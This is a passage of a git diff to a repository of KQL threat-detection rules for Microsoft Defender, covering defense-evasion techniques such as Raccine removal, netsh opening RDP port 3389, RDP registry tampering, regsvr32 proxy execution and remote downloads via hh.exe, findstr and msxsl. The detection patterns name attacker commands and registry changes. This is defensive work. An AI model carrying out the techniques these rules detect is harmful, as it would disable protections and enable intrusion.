attack.t1027.002 +// False Positives: +// - Legitimate Py2Exe Binaries +// - Known false positive caused with Python Anaconda +// - Various legitimate software is bundled from Python code into executables + +DeviceImageLoadEvents | where InitiatingProcessVersionInfoFileDescription =~ "Python Core" and (not((InitiatingProcessFolderPath contains "Python" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Anaconda3\\")))) and (not(isnull(InitiatingProcessFolderPath))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/raccine_uninstall.kql b/KQL/rules/Defense Evasion/raccine_uninstall.kql index 18a375f8..5819e516 100644 --- a/KQL/rules/Defense Evasion/raccine_uninstall.kql +++ b/KQL/rules/Defense Evasion/raccine_uninstall.kql @@ -1,12 +1,12 @@ -// Title: Raccine Uninstall -// Author: Florian Roth (Nextron Systems) -// Date: 2021-01-21 -// Level: high -// Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate deinstallation by administrative staff - -DeviceProcessEvents +// Title: Raccine Uninstall +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-21 +// Level: high +// Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate deinstallation by administrative staff + +DeviceProcessEvents | where (ProcessCommandLine contains "taskkill " and ProcessCommandLine contains "RaccineSettings.exe") or (ProcessCommandLine contains "reg.exe" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "Raccine Tray") or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "/DELETE" and ProcessCommandLine contains "Raccine Rules Updater") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql b/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql index bc506662..52f9dc57 100644 --- a/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql +++ b/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql @@ -1,12 +1,12 @@ -// Title: RDP Connection Allowed Via Netsh.EXE -// Author: Sander Wiebing -// Date: 2020-05-23 -// Level: high -// Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004 -// False Positives: -// - Legitimate administration activity - -DeviceProcessEvents +// Title: RDP Connection Allowed Via Netsh.EXE +// Author: Sander Wiebing +// Date: 2020-05-23 +// Level: high +// Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents | where ((ProcessCommandLine contains "portopening" or ProcessCommandLine contains "allow") and (ProcessCommandLine contains "firewall " and ProcessCommandLine contains "add " and ProcessCommandLine contains "tcp " and ProcessCommandLine contains "3389")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql index f9247303..545a01d6 100644 --- a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql +++ b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql @@ -1,13 +1,13 @@ -// Title: RDP Sensitive Settings Changed -// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali -// Date: 2022-08-06 -// Level: high -// Description: Detects tampering of RDP Terminal Service/Server sensitive settings. -// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1112 -// False Positives: -// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) - -DeviceRegistryEvents +// Title: RDP Sensitive Settings Changed +// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali +// Date: 2022-08-06 +// Level: high +// Description: Detects tampering of RDP Terminal Service/Server sensitive settings. +// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112 +// False Positives: +// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) + +DeviceRegistryEvents | where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql index 0d23e690..c6a6d953 100644 --- a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql +++ b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql @@ -1,13 +1,13 @@ -// Title: RDP Sensitive Settings Changed to Zero -// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali -// Date: 2022-09-29 -// Level: medium -// Description: Detects tampering of RDP Terminal Service/Server sensitive settings. -// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1112 -// False Positives: -// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) - -DeviceRegistryEvents +// Title: RDP Sensitive Settings Changed to Zero +// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali +// Date: 2022-09-29 +// Level: medium +// Description: Detects tampering of RDP Terminal Service/Server sensitive settings. +// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112 +// False Positives: +// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way) + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql b/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql index b8ed369a..63ca896d 100644 --- a/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql +++ b/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql @@ -1,13 +1,13 @@ -// Title: RegAsm.EXE Execution Without CommandLine Flags or Files -// Author: frack113 -// Date: 2025-06-04 -// Level: low -// Description: Detects the execution of "RegAsm.exe" without a commandline flag or file, which might indicate potential process injection activity. -// Usually "RegAsm.exe" should point to a dedicated DLL file or call the help with the "/?" flag. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.009 -// False Positives: -// - Legitimate use of Regasm by developers. - -DeviceProcessEvents +// Title: RegAsm.EXE Execution Without CommandLine Flags or Files +// Author: frack113 +// Date: 2025-06-04 +// Level: low +// Description: Detects the execution of "RegAsm.exe" without a commandline flag or file, which might indicate potential process injection activity. +// Usually "RegAsm.exe" should point to a dedicated DLL file or call the help with the "/?" flag. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.009 +// False Positives: +// - Legitimate use of Regasm by developers. + +DeviceProcessEvents | where (ProcessCommandLine endswith "RegAsm" or ProcessCommandLine endswith "RegAsm.exe" or ProcessCommandLine endswith "RegAsm.exe\"" or ProcessCommandLine endswith "RegAsm.exe'") and (FolderPath endswith "\\RegAsm.exe" or ProcessVersionInfoOriginalFileName =~ "RegAsm.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql b/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql index 67a400a8..bb0df4e6 100644 --- a/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql +++ b/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql @@ -1,10 +1,10 @@ -// Title: RegAsm.EXE Initiating Network Connection To Public IP -// Author: frack113 -// Date: 2024-04-25 -// Level: medium -// Description: Detects "RegAsm.exe" initiating a network connection to public IP adresses -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.009 - -DeviceNetworkEvents +// Title: RegAsm.EXE Initiating Network Connection To Public IP +// Author: frack113 +// Date: 2024-04-25 +// Level: medium +// Description: Detects "RegAsm.exe" initiating a network connection to public IP adresses +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.009 + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\regasm.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql b/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql index 921895a9..1b2076fa 100644 --- a/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql +++ b/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql @@ -1,12 +1,12 @@ -// Title: Regedit as Trusted Installer -// Author: Florian Roth (Nextron Systems) -// Date: 2021-05-27 -// Level: high -// Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Regedit as Trusted Installer +// Author: Florian Roth (Nextron Systems) +// Date: 2021-05-27 +// Level: high +// Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\regedit.exe" and (InitiatingProcessFolderPath endswith "\\TrustedInstaller.exe" or InitiatingProcessFolderPath endswith "\\ProcessHacker.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql b/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql index 5721ff3d..d77ee3a0 100644 --- a/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql +++ b/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql @@ -1,12 +1,12 @@ -// Title: REGISTER_APP.VBS Proxy Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-19 -// Level: medium -// Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign - -DeviceProcessEvents +// Title: REGISTER_APP.VBS Proxy Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign + +DeviceProcessEvents | where ProcessCommandLine contains "\\register_app.vbs" and ProcessCommandLine contains "-register" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql b/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql index 5af6576b..d3ba1b1c 100644 --- a/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql +++ b/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql @@ -1,10 +1,10 @@ -// Title: Registry Entries For Azorult Malware -// Author: Trent Liffick -// Date: 2020-05-08 -// Level: critical -// Description: Detects the presence of a registry key created during Azorult execution -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112 - -DeviceRegistryEvents +// Title: Registry Entries For Azorult Malware +// Author: Trent Liffick +// Date: 2020-05-08 +// Level: critical +// Description: Detects the presence of a registry key created during Azorult execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112 + +DeviceRegistryEvents | where RegistryKey endswith "SYSTEM*" and RegistryKey endswith "\\services\\localNETService" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql b/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql index 01f3e1d6..4d45978d 100644 --- a/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql +++ b/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql @@ -1,10 +1,10 @@ -// Title: Registry Persistence via Service in Safe Mode -// Author: frack113 -// Date: 2022-04-04 -// Level: high -// Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.001 - -DeviceRegistryEvents +// Title: Registry Persistence via Service in Safe Mode +// Author: frack113 +// Date: 2022-04-04 +// Level: high +// Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 + +DeviceRegistryEvents | where (RegistryValueData =~ "Service" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal*" or RegistryKey endswith "\\Control\\SafeBoot\\Network*") and RegistryKey endswith "\\(Default)") and (not(((RegistryValueData =~ "Service" and InitiatingProcessFolderPath =~ "C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\Hexnode Updater\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\Hexnode Updater\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\Hexnode Agent\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\Hexnode Agent\\(Default)")) or (RegistryValueData =~ "Service" and InitiatingProcessFolderPath endswith "\\MBAMInstallerService.exe" and RegistryKey endswith "\\MBAMService\\(Default)") or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\SAVService\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\SAVService\\(Default)"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql b/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql index 322e2104..478e0a28 100644 --- a/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql +++ b/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql @@ -1,12 +1,12 @@ -// Title: Regsvr32 DLL Execution With Suspicious File Extension -// Author: Florian Roth (Nextron Systems), frack113 -// Date: 2021-11-29 -// Level: high -// Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.010 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Regsvr32 DLL Execution With Suspicious File Extension +// Author: Florian Roth (Nextron Systems), frack113 +// Date: 2021-11-29 +// Level: high +// Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine endswith ".bin" or ProcessCommandLine endswith ".bmp" or ProcessCommandLine endswith ".cr2" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".eps" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".ico" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".nef" or ProcessCommandLine endswith ".orf" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".raw" or ProcessCommandLine endswith ".rtf" or ProcessCommandLine endswith ".sr2" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tif" or ProcessCommandLine endswith ".tiff" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".txt") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql b/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql index f2e6928a..3225331f 100644 --- a/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql +++ b/KQL/rules/Defense Evasion/regsvr32_execution_from_highly_suspicious_location.kql @@ -1,12 +1,12 @@ -// Title: Regsvr32 Execution From Highly Suspicious Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-26 -// Level: high -// Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.010 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Regsvr32 Execution From Highly Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-26 +// Level: high +// Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains "\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains "\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\Tasks\\" or ProcessCommandLine contains "\\Windows\\Tracing\\") or ((ProcessCommandLine contains " \"C:\\" or ProcessCommandLine contains " C:\\" or ProcessCommandLine contains " 'C:\\" or ProcessCommandLine contains "D:\\") and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\" or ProcessCommandLine contains "C:\\Program Files\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " \"C:\\Windows\\" or ProcessCommandLine contains " 'C:\\Windows\\"))))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql b/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql index c0686fd3..b16dd95f 100644 --- a/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql +++ b/KQL/rules/Defense Evasion/regsvr32_execution_from_potential_suspicious_location.kql @@ -1,12 +1,12 @@ -// Title: Regsvr32 Execution From Potential Suspicious Location -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-26 -// Level: medium -// Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.010 -// False Positives: -// - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary. - -DeviceProcessEvents +// Title: Regsvr32 Execution From Potential Suspicious Location +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-26 +// Level: medium +// Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary. + +DeviceProcessEvents | where (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql b/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql index 1c403f04..2d3a7a36 100644 --- a/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql +++ b/KQL/rules/Defense Evasion/remote_access_tool_rurat_execution_from_unusual_location.kql @@ -1,10 +1,10 @@ -// Title: Remote Access Tool - RURAT Execution From Unusual Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-19 -// Level: medium -// Description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files') -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Remote Access Tool - RURAT Execution From Unusual Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-19 +// Level: medium +// Description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files') +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe") or ProcessVersionInfoProductName =~ "Remote Utilities") and (not((FolderPath startswith "C:\\Program Files\\Remote Utilities" or FolderPath startswith "C:\\Program Files (x86)\\Remote Utilities"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql b/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql index 313674f4..4c8c2c45 100644 --- a/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql +++ b/KQL/rules/Defense Evasion/remote_chm_file_download_execution_via_hh_exe.kql @@ -1,10 +1,10 @@ -// Title: Remote CHM File Download/Execution Via HH.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-29 -// Level: high -// Description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.001 - -DeviceProcessEvents +// Title: Remote CHM File Download/Execution Via HH.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-29 +// Level: high +// Description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "\\\\") and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql b/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql index 77b5df98..6053c9df 100644 --- a/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql +++ b/KQL/rules/Defense Evasion/remote_code_execute_via_winrm_vbs.kql @@ -1,10 +1,10 @@ -// Title: Remote Code Execute via Winrm.vbs -// Author: Julia Fomina, oscd.community -// Date: 2020-10-07 -// Level: medium -// Description: Detects an attempt to execute code or create service on remote host via winrm.vbs. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216 - -DeviceProcessEvents +// Title: Remote Code Execute via Winrm.vbs +// Author: Julia Fomina, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: Detects an attempt to execute code or create service on remote host via winrm.vbs. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents | where (ProcessCommandLine contains "winrm" and ProcessCommandLine contains "invoke Create wmicimv2/Win32_" and ProcessCommandLine contains "-r:http") and (FolderPath endswith "\\cscript.exe" or ProcessVersionInfoOriginalFileName =~ "cscript.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql b/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql index 28938509..4f2df68f 100644 --- a/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql +++ b/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql @@ -1,10 +1,10 @@ -// Title: Remote File Download Via Findstr.EXE -// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-10-05 -// Level: medium -// Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 - -DeviceProcessEvents +// Title: Remote File Download Via Findstr.EXE +// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-05 +// Level: medium +// Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 + +DeviceProcessEvents | where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -v " or ProcessCommandLine contains " /v " or ProcessCommandLine contains " –v " or ProcessCommandLine contains " —v " or ProcessCommandLine contains " ―v ") and (ProcessCommandLine contains " -l " or ProcessCommandLine contains " /l " or ProcessCommandLine contains " –l " or ProcessCommandLine contains " —l " or ProcessCommandLine contains " ―l ") and ProcessCommandLine contains "\\\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql b/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql index ddeb538c..87d6e351 100644 --- a/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql +++ b/KQL/rules/Defense Evasion/remote_xsl_execution_via_msxsl_exe.kql @@ -1,12 +1,12 @@ -// Title: Remote XSL Execution Via Msxsl.EXE -// Author: Swachchhanda Shrawan Poudel -// Date: 2023-11-09 -// Level: high -// Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1220 -// False Positives: -// - Msxsl is not installed by default and is deprecated, so unlikely on most systems. - -DeviceProcessEvents +// Title: Remote XSL Execution Via Msxsl.EXE +// 